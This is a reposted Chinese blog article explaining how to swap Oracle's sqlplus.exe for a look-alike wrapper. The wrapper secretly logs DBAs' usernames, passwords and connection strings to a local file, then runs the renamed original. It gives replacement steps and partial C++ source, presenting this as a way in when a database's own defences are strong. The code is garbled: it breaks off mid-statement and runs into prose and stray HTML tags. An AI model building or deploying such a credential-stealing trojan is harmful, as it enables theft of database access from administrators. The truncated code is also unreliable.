>  기사  >  데이터 베이스  >  偷龙转凤SQLPlus得到数据库登录信息

偷龙转凤SQLPlus得到数据库登录信息

WBOY
WBOY원래의
2016-06-07 15:36:061361검색

当DBA登录本地或远程数据库时,为了省事,用 sqlplus 用户名/ 密码 @连接服务名 的方式登录数据库是再平常不过了,而我们如果将Oracle的SQLPlus换成我们自己的实现,然后当使用时,记录下它的登录信息,就得到了数据库的用户名,密码等信息。 这是一种很简单

         当DBA登录本地或远程数据库时,为了省事,用"sqlplus 用户名/密码@连接服务名" 的方式登录数据库是再平常不过了,而我们如果将Oracle的SQLPlus换成我们自己的实现,然后当使用时,记录下它的登录信息,就得到了数据库的用户名,密码等信息。

        这是一种很简单的,偷龙转凤的方式,有其局限性。但有时,如果数据库本身的防护很严,从DBA客户端这边下手,利用这种方式有时也能有意外的收获。

效果图:

   这种方式跑起来和Oracle原来的是一模一样的. 光看是看不来什么地。 偷龙转凤SQLPlus得到数据库登录信息

   偷龙转凤SQLPlus得到数据库登录信息

被记录下的登录信息:

偷龙转凤SQLPlus得到数据库登录信息

代码如下:  

/**
*author: xiongchuanliang
*desc: 用自定义的sqlplus替换掉Oracle原版的,并在自定义的程序中记录下用户的登录信息的演示
       1. 找到Oracle自带的sqlplus.exe,将其命名为其它文件
	   2. 用自定义的替换掉原版
*/
#include <stdio.h>
#include <stdlib.h>

#include <windows.h>

#include <iostream>
#include <fstream>
using namespace std;

HRESULT CMDEx(const char *pCmd) ;

//将原版的sqlplus.exe改为sqlplus_ora.exe";
const string sqlplus_path = "C:/oracle/product/11.2.0/dbhome_1/BIN/sqlplus_ora.exe";
const string oper_log = "C:/mysqlplus.log";

int main(int argc,char* argv[])
{	
	string sqlplus_cmd = sqlplus_path;

	ofstream flog(oper_log,ios::app);
	SYSTEMTIME sys;
	if(flog){ 			
		GetLocalTime(&sys);
		flog  这仅演示了下基本功能,以此类推,其它数据库的一些命令行程序也可以用这种方式做,<span><strong>对这种方式最好的防护方法是在输入连接字符串时不输入明文的密码</strong></span>。

<p><br>
</p>
<p>MAIL: xcl_168@aliyun.com</p>
<p>BLOG: http://blog.csdn.net/xcl168</p>


</fstream></iostream></windows.h></stdlib.h></stdio.h>
성명:
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
이전 기사:CComboBox技巧다음 기사:javafx学习之数据库操作